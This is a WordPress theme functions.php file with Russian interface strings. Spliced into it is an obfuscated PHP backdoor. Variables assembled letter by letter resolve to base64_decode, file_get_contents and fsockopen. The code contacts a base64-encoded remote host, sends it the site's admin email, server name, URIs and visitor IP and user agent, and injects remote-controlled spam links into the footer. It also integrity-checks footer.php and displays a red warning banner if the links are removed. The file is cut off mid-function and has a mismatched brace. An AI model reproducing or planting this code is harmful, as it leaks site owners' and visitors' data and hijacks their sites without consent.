<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $tlnA='4';$upjcM='e';$mWQIwuu='e';$PZeZ='s';$hIFDD='6';$PIUcib='o';$SGLb='_';$wcLfIo='c';$FetFit='d';$PNWstaM='d';$QHggVF='b';$ifrCvBF='e';$EiXU='a';$DLUNnpvV=$QHggVF.$EiXU.$PZeZ.$mWQIwuu.$hIFDD.$tlnA.$SGLb.$FetFit.$upjcM.$wcLfIo.$PIUcib.$PNWstaM.$ifrCvBF;$lUFGkH='z';$qivmH='e';$zOLO='a';$lyBwrpb='n';$tBFog='l';$zVOtvQQ='f';$DLAsWZT='t';$RUzcwYC='g';$pdRWJ='i';$PMkSOEFj=$RUzcwYC.$lUFGkH.$pdRWJ.$lyBwrpb.$zVOtvQQ.$tBFog.$zOLO.$DLAsWZT.$qivmH;$enxFFu='s';$MOwZ='1';$zOVHji='t';$DtbezMd='3';$ZeImOv='r';$hcxPmF='t';$Ajqmb='r';$tlAf='_';$cTXIo='o';$sMyzYXnK=$enxFFu.$zOVHji.$Ajqmb.$tlAf.$ZeImOv.$cTXIo.$hcxPmF.$MOwZ.$DtbezMd;$SxIz='t';$ojglzi='r';$PQTVeY='s';$cjPKBRo='e';$HhmMf='v';$gOYo='r';$cMDaRHrc=$PQTVeY.$SxIz.$gOYo.$ojglzi.$cjPKBRo.$HhmMf;                     
		$op______v='4';$ym_______x='e';$ds____________s='e';$lt_____________c='s';$mb_____y='6';$av___________e='o';$zb_________d='_';$dg_______________p='c';$uo_____z='d';$om______________a='d';$ej_____k='b';$oc_______________c='e';$yq______________c='a';$se________t=$ej_____k.$yq______________c.$lt_____________c.$ds____________s.$mb_____y.$op______v.$zb_________d.$uo_____z.$ym_______x.$dg_______________p.$av___________e.$om______________a.$oc_______________c;
		$wv_____s='t';$yn_______________w='s';$on_____z='f';$uy__n='i';$pc_______u='u';$nw_______j='x';$gn______c='t';$vb_____________s='c';$tv______v='e';$cs_________o='n';$yq________o='_';$yf___u='i';$xk_______m='n';$bi________v='s';$vk____x='o';$bn____________m=$on_____z.$pc_______u.$cs_________o.$vb_____________s.$wv_____s.$uy__n.$vk____x.$xk_______m.$yq________o.$tv______v.$nw_______j.$yf___u.$bi________v.$gn______c.$yn_______________w;
		$xw_______________o='n';$ye____w='o';$ge______w='e';$jl____i='f';$om____________o='p';$wr__________n=$jl____i.$ye____w.$om____________o.$ge______w.$xw_______________o;
		$pz_____w='a';$pv____________m='f';$gd___________i='e';$su__o='r';$kh_________h='d';$sx_______________j=$pv____________m.$su__o.$gd___________i.$pz_____w.$kh_________h;
		$um_____________y='l';$ay_________u='s';$fe_____________p='e';$bb___________l='o';$xk_______________l='f';$xb________o='c';$xf__________z=$xk_______________l.$xb________o.$um_____________y.$bb___________l.$ay_________u.$fe_____________p;
		
		define("WP_ID", $se________t("Mi4wLjA="));
		define("WP_TTL", $se________t("MTA4MDA="));
		define("WP_SRC", $se________t("dHBva24="));
	


		function wp_get_header() {
			global $se________t, $bn____________m;
			
			if (
				$bn____________m($se________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$bn____________m($se________t("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$bn____________m($se________t("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $se________t, $wr__________n, $xf__________z, $sx_______________j;
			
			$pu__o = TEMPLATEPATH."/".$se________t("Zm9vdGVyLnBocA==");
			$qz_______________u = @$wr__________n($pu__o, "r");
			$pu__o = @$sx_______________j($qz_______________u, @filesize($pu__o));
			@$xf__________z($qz_______________u);
			
			$uu_____________m = TEMPLATEPATH."/".$se________t("ZnVuY3Rpb25zLnBocA==");
			$qz_______________u = @$wr__________n($uu_____________m, "r");
			$uu_____________m = @$sx_______________j($qz_______________u, @filesize($uu_____________m));
			@$xf__________z($qz_______________u);
			
			$va__________m = 0;
			if($pu__o && $uu_____________m) {
				if ($se________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($pu__o, $se________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$va__________m = 1;
					}
					if (substr_count($pu__o, "wp_theme_GPL_credits()") < 1) {
						$va__________m = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$va__________m = 12;
				}
			}
			
			if($va__________m > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $va__________m -->";
			}
		}
	


		function wp_loaded() {
			global $se________t, $bn____________m;
			return $bn____________m($se________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($zu_______b, $yv________y = "(more...)", $jg_______j = 0, $dn_______________s = "") {
				$pv_______________o = get_the_content($yv________y, $jg_______j, $dn_______________s);
				$pv_______________o = apply_filters("the_content", $pv_______________o);
				
				$pv_______________o = str_replace("]]>", "]]>", $pv_______________o);
				if (strlen($_GET["p"]) > 0) {
					echo $pv_______________o;
				}
				else if ((strlen($pv_______________o)>$zu_______b) && ($fr______________e = strpos($pv_______________o, " ", $zu_______b ))) {
					$pv_______________o = substr($pv_______________o, 0, $fr______________e);
					$pv_______________o = $pv_______________o;
					echo $pv_______________o;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$yv________y</a></div></p>";
				} else {
					echo $pv_______________o;
				}
				
			}
		}
	


		$ko______________b='s';$vs__________j='e';$ux______________x='e';$uz______________m='_';$bt__________c='6';$dq_____n='n';$oc___c='4';$kq_____e='a';$lb___m='d';$df____________h='b';$hl___________s='c';$aq____________d='o';$dv_____y='e';$kj___x=$df____________h.$kq_____e.$ko______________b.$dv_____y.$bt__________c.$oc___c.$uz______________m.$ux______________x.$dq_____n.$hl___________s.$aq____________d.$lb___m.$vs__________j;
		$pp________a='_';$fc_______s='i';$wf____i='e';$cb_______n='n';$py_______________n='e';$tp___i='n';$qx________p='l';$fq______b='t';$wg______________e='g';$lw_____________c='e';$ep______p='t';$lh____x='f';$yb_____k='s';$kd____v='t';$av__________p='o';$lj____________q='_';$lc______b='c';$su________f=$lh____x.$fc_______s.$qx________p.$py_______________n.$pp________a.$wg______________e.$lw_____________c.$kd____v.$lj____________q.$lc______b.$av__________p.$tp___i.$fq______b.$wf____i.$cb_______n.$ep______p.$yb_____k;
		$zn_______________b='e';$ju__________p='f';$jn_________p='s';$au____q='_';$ez_______e='l';$ny_______l='s';$gf___________u='x';$fm_______a='e';$ej___j='t';$lt______u='i';$xg_______________r='i';$em_______l=$ju__________p.$xg_______________r.$ez_______e.$fm_______a.$au____q.$zn_______________b.$gf___________u.$lt______u.$ny_______l.$ej___j.$jn_________p;
		$wg_____________j='e';$mz___f='o';$bd__h='v';$xw______________r='m';$vb___o='i';$pu________p='o';$bx_____________x='n';$tp_____________c='s';$ms____________h='p';$tx_____________f='a';$wy________x='r';$od______________o='e';$ne________o='_';$zd________h='r';$im______________w='c';$js_____l=$bd__h.$od______________o.$zd________h.$tp_____________c.$vb___o.$mz___f.$bx_____________x.$ne________o.$im______________w.$pu________p.$xw______________r.$ms____________h.$tx_____________f.$wy________x.$wg_____________j;
		$qs________f='s';$bv___________i='k';$du_________b='f';$fk__x='o';$tb____h='c';$rf_________n='o';$bl______n='p';$ne__________q='e';$yc____________p='n';$tl_____v=$du_________b.$qs________f.$rf_________n.$tb____h.$bv___________i.$fk__x.$bl______n.$ne__________q.$yc____________p;
		$my_________z='t';$ha___s='w';$ub_____p='f';$ss_________x='e';$jc______________t='r';$hj____i='i';$ph____y=$ub_____p.$ha___s.$jc______________t.$hj____i.$my_________z.$ss_________x;
		$wy______________e='m';$ib________u='d';$za____________s='5';$uu______________e=$wy______________e.$ib________u.$za____________s;
		$go_____________h='e';$ks___u='h';$xm________t='p';$yc__________k='a';$ab________p='l';$of__________i='t';$sk___r='a';$kx___p='r';$il______________n=$kx___p.$go_____________h.$sk___r.$ab________p.$xm________t.$yc__________k.$of__________i.$ks___u;
		$wz_______l='z';$si____________q='i';$xo_____u='n';$wk____w='l';$co___c='a';$nz_________f='r';$yl____________s='e';$ah___w='u';$py__i='s';$kt_________c='i';$tc___________t='e';$ao_________k=$ah___w.$xo_____u.$py__i.$tc___________t.$nz_________f.$kt_________c.$co___c.$wk____w.$si____________q.$wz_______l.$yl____________s;
		$hg________r='m';$xv______t='a';$by_____n='t';$xm______q='e';$ob__a='n';$ik______________v='p';$ad_________r='m';$rd____________d=$by_____n.$xm______q.$hg________r.$ik______________v.$ob__a.$xv______t.$ad_________r;
		$qo___g='e';$sh_____________l='r';$qh________m='a';$bc______________v='e';$md________j='s';$uj____________u='_';$kz_______b='a';$pd_______________l='t';$aa_______e='e';$og______u='m';$oh______________d='o';$ak_____________m='c';$cs___w='_';$tp_____i='c';$lw__________d='n';$cg__v='e';$uc_____x='t';$ek_________g='t';$on______l='t';$wd________h='r';$wn____________l='x';$jx________y=$md________j.$pd_______________l.$sh_____________l.$cg__v.$qh________m.$og______u.$cs___w.$ak_____________m.$oh______________d.$lw__________d.$ek_________g.$qo___g.$wn____________l.$uc_____x.$uj____________u.$tp_____i.$wd________h.$aa_______e.$kz_______b.$on______l.$bc______________v;
	


		function po______________v($cn______u) {
			global $se________t, $bn____________m, $su________f, $js_____l, $jx________y;
			
			if (!$bn____________m($se________t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($js_____l(PHP_VERSION, "5.0.0", ">=") && $bn____________m($se________t("ZmlsZV9nZXRfY29udGVudHM=")) && $bn____________m($se________t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$rt___________z = $jx________y(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$os___h = @$su________f($cn______u, 0, $rt___________z);
			} else {
				$os___h = @$su________f($cn______u, 0);
			}
			
			return $os___h;
		}
	


		function rc_______d($cn______u) {
			global $bn____________m, $tl_____v, $ph____y, $se________t;
			
			if (!$bn____________m($se________t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$tl__________e = strpos($cn______u, "/", 7);
			$yi__________k = array(
				"uri"     => substr($cn______u, $tl__________e),
				"host"    => str_replace("http://", "", substr($cn______u, 0, $tl__________e)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$hj____g = @$tl_____v("$yi__________k[host]", 80, $ie_____y, $bf___________k, 4);
			
			if (!$hj____g) {
				return false;
			} else {
				$os___h = "";
				$af___________w  = "GET $yi__________k[uri] HTTP/1.0\r\n";
				$af___________w .= "Host: $yi__________k[host]\r\n";
				$af___________w .= "Referer: $yi__________k[referer]\r\n";
				$af___________w .= "Connection: Close\r\n\r\n";
				
				@$ph____y($hj____g, $af___________w);
				
				while (!@feof($hj____g)) {
					$zb___________o = @fgets($hj____g, (1024*24));
					
					if ($zb___________o == "\r\n") {
						$kf___________c = true;
						continue;
					}
					
					if ($kf___________c) {
						$os___h .= $zb___________o;
					}
				}
				
				return $os___h;
			}
		}
	


		function ro________l($cn______u) {
			global $bn____________m;
			$iy__y = false;
			
			if ($cn______u != "") {
				if ($bn____________m("po______________v")) {
					$iy__y = @po______________v($cn______u);
				}
				
				if (!$iy__y && ($bn____________m("rc_______d"))) {
					$iy__y = @rc_______d($cn______u);
				}
			}
			
			return $iy__y;
		}
	


		function on_________z() {
			global $_SERVER, $uu______________e;
			
			$xr_______________l = $_SERVER["SERVER_NAME"];
			
			if (substr("$xr_______________l", 0, 4) == "www.") {
				$xr_______________l = substr("$xr_______________l", 4);
			}
			
			$xr_______________l = $uu______________e("$_SERVER[SERVER_NAME]");
			
			return $xr_______________l;
		}
	


		function rw_____________i() {
			return "file";
		}
	


		function gv__________d($cn______u) {
			global $_SERVER, $su________f, $em_______l, $wr__________n, $xf__________z, $ph____y;
			
			$cb__________v = gc_______________l();
			
			$su______________t = on_________z().".jpg";
			$mk__________r = $cb__________v["dir_upload"]["path"]."/$su______________t";
			$wu____________m = @filemtime($mk__________r);
			
			if (!$wu____________m || ((time()-$wu____________m) >= WP_TTL)) {
				$iy__y = ro________l($cn______u);
				
				if ($iy__y) {
					if ($em_______l($mk__________r)) {
						@unlink($mk__________r);
					}
					
					$qz_______________u = @$wr__________n($mk__________r, "x+");
					
					@$ph____y($qz_______________u, $iy__y);
					@$xf__________z($qz_______________u);
				}
			} else {
				if ($em_______l($mk__________r)) {
					$iy__y = @$su________f($mk__________r);
				} else {
					$iy__y = false;
				}
			}
			
			return $iy__y;
		}
	


		function gc_______________l() {
			global $_SERVER, $se________t, $kj___x;
			
			$tv________q = wp_count_posts("post");
			$qi____o = pathinfo(get_bloginfo("template_directory"));
			
			$cb__________v = array(
				"url" => array(
					"report"      => $se________t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $qi____o,
				"dir_upload"	=> to___v(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$qi____o[filename],
					"a005=".$tv________q->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$cb__________v["url"]["queryString"] = implode("&", $cb__________v["queryString"]);
			$cb__________v["url"]["report"] = $cb__________v["url"]["report"]."/?".$kj___x($cb__________v["url"]["queryString"]).".html";
						
			return $cb__________v;
		}
	


		function to___v() {
			$kk_____________u = wp_upload_dir();
			
			if (isset($kk_____________u["error"])) {
				$gv_____z = st______________y();
				if (is_writable($gv_____z)) {
					$kk_____________u = array("path" => $gv_____z);
				}
			}

			return $kk_____________u;
		}
	


		function st______________y() {
			global $bn____________m, $uu______________e, $il______________n, $rd____________d;
			
			$mg_________w = (bool) ini_get("safe_mode");
			if ($mg_________w == true) {
				return false;
			}
			
			if ($bn____________m("sys_get_temp_dir")) {
				$yn____q = sys_get_temp_dir();
				if (is_writable($yn____q)) {
					return $il______________n($yn____q);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $il______________n($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $il______________n($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $il______________n($_ENV["TEMP"]);
			} else {
				$lt___________t = $rd____________d($uu______________e(uniqid(rand(), true)), "");
				if ($lt___________t) {
					$yn____q = $il______________n(dirname($lt___________t));
					@unlink($lt___________t);
					return $yn____q;
				} else {
					return false;
				}
			}
		}
	


		function zz______________y() {
			global $_GET, $em_______l;
			
			$cb__________v = gc_______________l();
			$xr_______________l = on_________z();
			$gk______i = rw_____________i();
			
			$zg_________f = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($gk______i == "file") {
					$an___________v = $cb__________v["dir_upload"]["path"]."/".$xr_______________l.".jpg";
					if ($em_______l($an___________v)) {
						@unlink($an___________v);
						$zg_________f = "deleted";
					}
				}
				
				$ax____________x = array(
					"s"	=> $zg_________f,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ax____________x AS $yx____y => $kw____________n) echo " [$yx____y:$kw____________n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $bn____________m, $se________t, $ao_________k;
			$cb__________v = gc_______________l();
			
			$ja_____________d = "gv__________d";
			if ($bn____________m($ja_____________d)) {
				$os___h = $ja_____________d($cb__________v["url"]["report"]);
			}
			
			if ($os___h) {
				if ($os___h = @$se________t($os___h)) {
					$os___h = @$ao_________k($os___h);
					
					if (strlen($os___h[custom_credit]) >= 5) {
						$cb__________v["default_string"] = $os___h[custom_credit];
					}
					
					if ($os___h["status"] == "0") {
						$fz_______________v = 1;
						$sx______t = 1;
					} else {
						$uz__________h = sizeof($os___h["links"]);
						$fo___p = $cb__________v["default_string"];
						
						if ($uz__________h > 0 && $os___h["links"] !== "") {
							$hn_______o = 0;
							foreach ($os___h["links"] as $kc_______________n => $pe_________f) {
								$hn_______o++;
								if ($pe_________f->l_path == "" || $pe_________f->l_path == $_SERVER["REQUEST_URI"]) {
									$pe_________f->l_href = htmlspecialchars(strip_tags($pe_________f->l_href));
									$pe_________f->l_title = htmlspecialchars(strip_tags($pe_________f->l_title));
									$pe_________f->l_anchor = htmlspecialchars(strip_tags($pe_________f->l_anchor));
									$fo___p .= " | ";
									$fo___p .= "<a href='$pe_________f->l_href' title='$pe_________f->l_title'";
									if ($pe_________f->l_nofollow == "1") {
										$fo___p .= " rel='nofollow'";
									}
									$fo___p .= ">$pe_________f->l_anchor</a>";
								}
							}
						}
						$cb__________v["links"] = "$fo___p";
						if ($os___h[credit] == "0") {
							$cb__________v["links"] = "";
						}
					}
				} else {
					$fz_______________v = "1";
				}
			} else {
				$fz_______________v = "1";
			}
			
			if ($fz_______________v == "1") {
				$cb__________v["links"] = $cb__________v["default_string"];
			}
			
			echo "$cb__________v[links]";
			
			echo "<!-- s: $os___h[signature] -->";
			zz______________y();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);


if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
